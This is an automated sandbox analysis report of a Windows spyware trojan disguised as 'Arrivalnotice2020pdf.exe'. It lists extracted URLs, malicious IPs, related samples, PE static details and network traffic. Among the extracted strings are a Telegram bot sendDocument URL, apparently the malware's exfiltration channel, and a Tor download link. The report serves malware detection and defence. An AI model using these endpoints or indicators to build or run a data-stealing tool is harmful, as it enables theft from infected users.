                          https://dBHeYNWtul3f.netMSBuild.exe, 00000003.00000002.479039341.000000000364E000.00000004.00000001.sdmp, MSBuild.exe, 00000003.00000002.479119119.0000000003668000.00000004.00000001.sdmp, MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haMSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.org/bot%telegramapi%/Arrivalnotice2020pdf.exe, 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp, MSBuild.exe, 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmpfalse
                            high
                            https://api.ipify.orgx&MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://ZLVZGU.comMSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://secure.comodo.com/CPS0MSBuild.exe, 00000003.00000003.409109256.000000000791A000.00000004.00000001.sdmpfalse
                              high
                              https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xMSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpfalse
                                high
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipArrivalnotice2020pdf.exe, MSBuild.exe, 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://api.ipify.org/(MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpfalse
                                  high
                                  https://api.ipify.orgGETMozilla/5.0MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  103.9.171.52
                                  unknownAustralia
                                  45638SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUtrue
                                  174.129.214.20
                                  unknownUnited States
                                  14618AMAZON-AESUSfalse

                                  General Information

                                  Joe Sandbox Version:31.0.0 Red Diamond
                                  Analysis ID:323773
                                  Start date:27.11.2020
                                  Start time:14:24:11
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 6m 15s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:Arrivalnotice2020pdf.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:23
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@4/0@2/2
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 87.8% (good quality ratio 82.4%)
                                  • Quality average: 81.9%
                                  • Quality standard deviation: 28.9%
                                  HCA Information:
                                  • Successful, ratio: 92%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                  • TCP Packets have been reduced to 100
                                  • Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.147.198.201, 104.42.151.234, 51.104.139.180, 23.210.248.85, 20.54.26.129, 8.241.122.254, 8.248.115.254, 8.253.95.249, 8.253.204.121, 67.26.137.254, 51.104.144.132, 92.122.213.247, 92.122.213.194
                                  • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  14:25:10API Interceptor746x Sleep call for process: MSBuild.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  174.129.214.20Response_to_Motion_to_Vacate.docGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  vQau1zZe6u.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  {REQUEST FOR QUOTATION-local lot.1,2,3,4,6container..exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  1119_673423.docGet hashmaliciousBrowse
                                  • api.ipify.org/?format=xml
                                  35WF7sZ7IR.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  FACTURA.PDF.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  Amended PO4800.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  ScanDocuments202011PDF.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  Commercial Invoice73802,PDF.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  QUOTE.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  1102905893.docGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  1PmYoQcjTf.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  uHrRcraZmP.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  qIFdMHzqoE.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  QZ0gaAlf0Z.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  XTS QT-00572 REV_ASME NAMEPLATE MATERIAL Spec_scanned from a xerox printer001.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  New Order_40981.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  CHIBYKE08.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  vT444moDbD.exeGet hashmaliciousBrowse
                                  • api.ipify.org/
                                  PRODUCT SPECIFICATIONS.exeGet hashmaliciousBrowse
                                  • api.ipify.org/

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  elb097307-934924932.us-east-1.elb.amazonaws.comlxpo.exeGet hashmaliciousBrowse
                                  • 54.204.14.42
                                  guy1.exeGet hashmaliciousBrowse
                                  • 54.225.66.103
                                  guy2.exeGet hashmaliciousBrowse
                                  • 54.243.161.145
                                  PO_0012009.xlsxGet hashmaliciousBrowse
                                  • 23.21.252.4
                                  5C.exeGet hashmaliciousBrowse
                                  • 54.225.169.28
                                  INV-6367-20_pdf.exeGet hashmaliciousBrowse
                                  • 54.225.66.103
                                  #A06578987.xlsmGet hashmaliciousBrowse
                                  • 54.204.14.42
                                  SecuriteInfo.com.Variant.Bulz.233365.3916.exeGet hashmaliciousBrowse
                                  • 23.21.252.4
                                  https://sugar-stirring-mockingbird.glitch.me/#comp@hansi.atGet hashmaliciousBrowse
                                  • 54.225.169.28
                                  INVOICE.xlsxGet hashmaliciousBrowse
                                  • 54.204.14.42
                                  PR24869408-V2.PDF.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  Inquiry_pdf.exeGet hashmaliciousBrowse
                                  • 23.21.42.25
                                  98650107.pdf.exeGet hashmaliciousBrowse
                                  • 23.21.42.25
                                  #U00d6deme Onay#U0131 Makbuzu.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  1125_56873981.docGet hashmaliciousBrowse
                                  • 54.243.161.145
                                  yFD40YF4upaZQYL.exeGet hashmaliciousBrowse
                                  • 54.235.142.93
                                  ER mexico.exeGet hashmaliciousBrowse
                                  • 54.235.83.248
                                  SecuriteInfo.com.BackDoor.SpyBotNET.25.28272.exeGet hashmaliciousBrowse
                                  • 54.243.164.148
                                  SecuriteInfo.com.BackDoor.SpyBotNET.25.6057.exeGet hashmaliciousBrowse
                                  • 50.19.252.36
                                  SecuriteInfo.com.BackDoor.SpyBotNET.25.7042.exeGet hashmaliciousBrowse
                                  • 23.21.42.25

                                  ASN

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUqpFvMReV7S.exeGet hashmaliciousBrowse
                                  • 103.42.108.46
                                  zisuzZpoW2.exeGet hashmaliciousBrowse
                                  • 103.27.32.34
                                  HMNo45VSzL.xlsGet hashmaliciousBrowse
                                  • 112.140.180.17
                                  http://benhams.info/backups/invoice/Get hashmaliciousBrowse
                                  • 223.130.27.213
                                  Account update for your HDFC Bank.exeGet hashmaliciousBrowse
                                  • 223.130.27.10
                                  PDF FILE.exeGet hashmaliciousBrowse
                                  • 223.130.27.10
                                  H4A2_423.EXEGet hashmaliciousBrowse
                                  • 103.27.32.34
                                  http://pinksheep.com/opencart/eRjcgIxS/&d=DwIFaQGet hashmaliciousBrowse
                                  • 223.130.27.125
                                  http://pinksheep.com/opencart/eRjcgIxS/&d=DwIFaQGet hashmaliciousBrowse
                                  • 223.130.27.125
                                  http://pinksheep.com/opencart/eRjcgIxS/Get hashmaliciousBrowse
                                  • 223.130.27.125
                                  SC# 84979926 Cargo Delivery .PDF.exeGet hashmaliciousBrowse
                                  • 223.130.27.10
                                  REP_IDT_070120_BOR_073020.docGet hashmaliciousBrowse
                                  • 103.9.171.8
                                  REP_IDT_070120_BOR_073020.docGet hashmaliciousBrowse
                                  • 103.9.171.8
                                  83163251.docGet hashmaliciousBrowse
                                  • 103.9.171.8
                                  753200739936864412.docGet hashmaliciousBrowse
                                  • 103.9.171.8
                                  83163251.docGet hashmaliciousBrowse
                                  • 103.9.171.8
                                  N_ME9604945610TR.docGet hashmaliciousBrowse
                                  • 103.9.171.8
                                  753200739936864412.docGet hashmaliciousBrowse
                                  • 103.9.171.8
                                  P_PB3183494383ZD.docGet hashmaliciousBrowse
                                  • 103.9.171.8
                                  K_NXE_070120_IBB_073020.docGet hashmaliciousBrowse
                                  • 103.9.171.8
                                  AMAZON-AESUSguy1.exeGet hashmaliciousBrowse
                                  • 54.225.66.103
                                  guy2.exeGet hashmaliciousBrowse
                                  • 54.243.161.145
                                  https://34.75.2o2.lol/XYWNc0aW9uPWwNsaWNrJngVybD1ovndHRwnczovL3NleY3wVyZWQtbG9naW4ubmV0nL3BhZ2VzLzQyY2FkNTJhZmU3YSZyZWNpcGllbnRfaWQ9NzM2OTg3ODg4JmNhbXBhaWduX3J1bl9pZD0zOTM3OTczGet hashmaliciousBrowse
                                  • 3.215.226.95
                                  https://bit.do/fLpprGet hashmaliciousBrowse
                                  • 54.83.52.76
                                  PO_0012009.xlsxGet hashmaliciousBrowse
                                  • 23.21.252.4
                                  https://webnavigator.co/?adprovider=AppFocus1&source=d-cp11560482685&group=cg60&device=c&keyword=&creative=477646941053&adposition=none&placement=www.123homeschool4me.com&target=segment_be_a_7802457135858218830&sl=&caid=11560482685&gw=1&test=%3a%2f%2fmailGet hashmaliciousBrowse
                                  • 54.90.26.145
                                  https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3DGet hashmaliciousBrowse
                                  • 52.202.11.207
                                  https://webmail-re5rere.web.app/?emailtoken=test@test.com&domain=test.comGet hashmaliciousBrowse
                                  • 34.236.142.3
                                  5C.exeGet hashmaliciousBrowse
                                  • 54.225.169.28
                                  INV-6367-20_pdf.exeGet hashmaliciousBrowse
                                  • 54.225.66.103
                                  #A06578987.xlsmGet hashmaliciousBrowse
                                  • 54.204.14.42
                                  https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3DGet hashmaliciousBrowse
                                  • 52.202.11.207
                                  http://pma.climabitus.com/undercook.phpGet hashmaliciousBrowse
                                  • 23.20.225.204
                                  https://brechi5.wixsite.com/owa-webmail-updatesGet hashmaliciousBrowse
                                  • 52.2.188.208
                                  https://sugar-stirring-mockingbird.glitch.me/#comp@hansi.atGet hashmaliciousBrowse
                                  • 52.205.236.122
                                  PR24869408-V2.PDF.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  Inquiry_pdf.exeGet hashmaliciousBrowse
                                  • 23.21.42.25
                                  98650107.pdf.exeGet hashmaliciousBrowse
                                  • 23.21.42.25
                                  #U00d6deme Onay#U0131 Makbuzu.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  http://searchlf.comGet hashmaliciousBrowse
                                  • 34.196.190.195

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Mal.Generic-S.26042.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  guy1.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  guy2.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  Exodus.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  INV-6367-20_pdf.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  #A06578987.xlsmGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  Order 51897.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  PR24869408-V2.PDF.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  98650107.pdf.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  #U00d6deme Onay#U0131 Makbuzu.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  Izezma64.dllGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  fuxenm32.dllGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  http://ancien-site-joomla.fr/build2.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  yFD40YF4upaZQYL.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  ER mexico.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  SecuriteInfo.com.BackDoor.SpyBotNET.25.28272.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  SecuriteInfo.com.BackDoor.SpyBotNET.25.6057.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  SecuriteInfo.com.ArtemisTrojan.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  SecuriteInfo.com.BackDoor.SpyBotNET.25.7042.exeGet hashmaliciousBrowse
                                  • 174.129.214.20
                                  SecuriteInfo.com.BackDoor.SpyBotNET.25.30157.exeGet hashmaliciousBrowse
                                  • 174.129.214.20

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (console) Intel 80386, for MS Windows
                                  Entropy (8bit):7.366904859461942
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:Arrivalnotice2020pdf.exe
                                  File size:387584
                                  MD5:ed6f9a5ace6367f4e532dd4ec40762ac
                                  SHA1:5ed4fd1e8a4e7dbed31928c2b7dd2ca1043cb68e
                                  SHA256:df107977e92465958c206bf42e33ce394e8573da3c4035b69bfa0d0eaf367914
                                  SHA512:e9315f1a9d8f0f8ddb0c48f08c8262af5a49937e11f57341d34cdd1ae3c945aec156faf7818e4a30cb61e82168e422e8ef697d1b9f74e9e31787aeea6d14d143
                                  SSDEEP:6144:3H5RPXz5XmxrAtJPsorVF3obF8V33f35XHC5UelMPBevP/539VI7hv9u998Q:X5RfzJmxrkBsor7aF8V33h3lerf5s7h6
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Km..Km..Km....>.Rm....<..m....=..m..Km...m....J.Xm..l. .Jm..l.:.Jm..Kmd.Jm..l.?.Jm..RichKm..........................PE..L..

                                  File Icon

                                  Icon Hash:00828e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x40482f
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows cui
                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                  DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                  Time Stamp:0x5FC0F239 [Fri Nov 27 12:34:01 2020 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:0
                                  File Version Major:6
                                  File Version Minor:0
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:0
                                  Import Hash:be74bcf76a56fe7a35a0a7f280acf926

                                  Entrypoint Preview

                                  Instruction
                                  call 00007FBDFC823183h
                                  jmp 00007FBDFC81BA5Ch
                                  call 00007FBDFC821DE7h
                                  mov edx, eax
                                  mov eax, dword ptr [edx+6Ch]
                                  cmp eax, dword ptr [0041FC94h]
                                  je 00007FBDFC81BBE2h
                                  mov ecx, dword ptr [0041FD54h]
                                  test dword ptr [edx+70h], ecx
                                  jne 00007FBDFC81BBD7h
                                  call 00007FBDFC821BCCh
                                  mov eax, dword ptr [eax+04h]
                                  ret
                                  call 00007FBDFC821DC1h
                                  mov edx, eax
                                  mov eax, dword ptr [edx+6Ch]
                                  cmp eax, dword ptr [0041FC94h]
                                  je 00007FBDFC81BBE2h
                                  mov ecx, dword ptr [0041FD54h]
                                  test dword ptr [edx+70h], ecx
                                  jne 00007FBDFC81BBD7h
                                  call 00007FBDFC821BA6h
                                  add eax, 000000A0h
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 44h
                                  mov eax, dword ptr [0041F9B8h]
                                  xor eax, ebp
                                  mov dword ptr [ebp-04h], eax
                                  push ebx
                                  xor ebx, ebx
                                  push esi
                                  mov esi, dword ptr [ebp+08h]
                                  mov dword ptr [ebp-2Ch], ebx
                                  mov eax, dword ptr [esi+000000A8h]
                                  mov dword ptr [ebp-20h], ebx
                                  mov dword ptr [ebp-24h], ebx
                                  mov dword ptr [ebp-1Ch], ebx
                                  mov dword ptr [ebp-28h], ebx
                                  mov dword ptr [ebp-44h], esi
                                  mov dword ptr [ebp-40h], ebx
                                  test eax, eax
                                  je 00007FBDFC81BEE2h
                                  push edi
                                  lea edi, dword ptr [esi+04h]
                                  cmp dword ptr [edi], ebx
                                  jne 00007FBDFC81BBEEh
                                  push edi
                                  push 00001004h
                                  push eax
                                  lea eax, dword ptr [ebp-44h]
                                  push ebx
                                  push eax
                                  call 00007FBDFC822648h
                                  add esp, 14h
                                  test eax, eax
                                  jne 00007FBDFC81BE8Ah
                                  push 00000004h
                                  call 00007FBDFC81EFB5h
                                  push 00000002h
                                  push 00000180h
                                  mov dword ptr [ebp-2Ch], eax

                                  Rich Headers

                                  Programming Language:
                                  • [RES] VS2012 build 50727
                                  • [LNK] VS2012 build 50727

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1d8680xc8.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000x1e0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5d0000x1484.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1c5200x40.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x180000x204.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x161290x16200False0.572199417373data6.66397370775IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .rdata0x180000x63ba0x6400False0.363125data4.85831029815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x1f0000x3c8840x39a00False0.978422417299data7.96878633663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .rsrc0x5c0000x1e00x200False0.53125data4.71767883295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x5d0000x83500x8400False0.127811316288data1.58596756783IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_MANIFEST0x5c0600x17dXML 1.0 document textEnglishUnited States

                                  Imports

                                  DLLImport
                                  KERNEL32.dllHeapReAlloc, EnumSystemLocalesEx, IsValidLocaleName, LCMapStringEx, GetUserDefaultLocaleName, GetModuleHandleW, TerminateProcess, GetCurrentProcess, LoadLibraryExW, FlsSetValue, FlsGetValue, FlsAlloc, SetUnhandledExceptionFilter, UnhandledExceptionFilter, SetFilePointerEx, ReadFile, GetConsoleMode, GetConsoleCP, FlushFileBuffers, CloseHandle, GetOEMCP, GetACP, IsValidCodePage, FreeEnvironmentStringsW, OutputDebugStringW, LoadLibraryW, SetStdHandle, WriteConsoleW, ReadConsoleW, CreateFileW, VirtualProtect, FlsFree, GetEnvironmentStringsW, GetTickCount64, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetModuleFileNameA, GetStartupInfoW, InitOnceExecuteOnce, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, Sleep, GetLocaleInfoEx, MultiByteToWideChar, GetStringTypeW, GetLastError, HeapFree, GetCommandLineA, GetCPInfo, RaiseException, RtlUnwind, HeapAlloc, InitializeCriticalSectionAndSpinCount, IsProcessorFeaturePresent, IsDebuggerPresent, GetProcessHeap, SetLastError, GetCurrentThreadId, ExitProcess, GetModuleHandleExW, GetProcAddress, HeapSize, GetStdHandle, WriteFile, GetModuleFileNameW, GetFileType
                                  MSWSOCK.dlls_perror, rexec, rcmd, GetNameByTypeW, EnumProtocolsW, dn_expand
                                  SETUPAPI.dllSetupQueryInfFileInformationW, SetupGetInfFileListA, SetupQueueDeleteA
                                  MPR.dllMultinetGetConnectionPerformanceA, WNetConnectionDialog1A, WNetGetResourceParentA, MultinetGetConnectionPerformanceW, WNetGetUserW
                                  WINMM.dlltimeEndPeriod, timeKillEvent, mmioFlush, midiStreamOut, joySetCapture, midiInStart
                                  pdh.dllPdhVbGetCounterPathElements, PdhRemoveCounter, PdhEnumObjectItemsW, PdhOpenQueryA, PdhVbIsGoodStatus, PdhGetLogFileSize
                                  msi.dll
                                  GDI32.dllSetMagicColors, EnumFontFamiliesExW, CreateRectRgn, RemoveFontMemResourceEx, EudcUnloadLinkW, CreateCompatibleBitmap, CreateFontIndirectA, ScaleViewportExtEx, CreatePatternBrush, CreateICW
                                  MAPI32.dll

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 27, 2020 14:24:55.405668974 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.425780058 CET49697443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.443604946 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.443954945 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.444000006 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.444039106 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.444077969 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.444089890 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.444113970 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.444125891 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.444180965 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.455045938 CET4434969792.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.455089092 CET4434969792.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.455174923 CET49697443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.455215931 CET49697443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.455785036 CET4434969792.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.455822945 CET4434969792.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.455879927 CET49697443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.455908060 CET49697443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.457230091 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.457493067 CET4434969792.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.457535028 CET4434969792.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.457590103 CET49697443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.457617998 CET49697443192.168.2.392.122.145.220
